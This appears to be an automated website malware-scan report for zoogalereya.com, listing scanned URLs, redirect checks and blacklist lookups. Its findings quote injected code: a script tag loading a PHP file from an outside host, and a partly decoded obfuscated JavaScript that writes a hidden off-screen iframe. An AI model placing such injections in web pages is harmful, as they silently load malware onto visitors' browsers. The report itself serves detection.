Scanned pages/files
Request | Server response | Status |
http://www.zoogalereya.com/ | 200 OK Content-Length: 8921 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pikaco.ru/themes/bartik/templates/w6nxh2tm.php?id=3924864"></script> | ||
http://www.wit-web.com/1a/no/toms3.js | 200 OK Content-Length: 231 Content-Type: application/x-javascript | clean |
http://www.zoogalereya.com/test404page.js | 404 Not Found Content-Length: 561 Content-Type: text/html | clean |
http://giringrim.com/est_files/.mysql_history.php | 200 OK Content-Length: 4382 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function YWPp(hU2K){return hU2K.replace(/%/g,'').replace(/[zS'r]/g,eL9I)}
...[3946 bytes skipped]... Decoded script: document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://giringrim.com/est_files/.mysql_history.php?s=hl9OVqO&id="+a+"\"></iframe>");}zQn=0;var scode=" ...[4469 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoogalereya.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoogalereya.com
Referer: http://www.google.com/search?q=zoogalereya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoogalereya.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zoogalereya.com/
Result: zoogalereya.com is not infected or malware details are not published yet.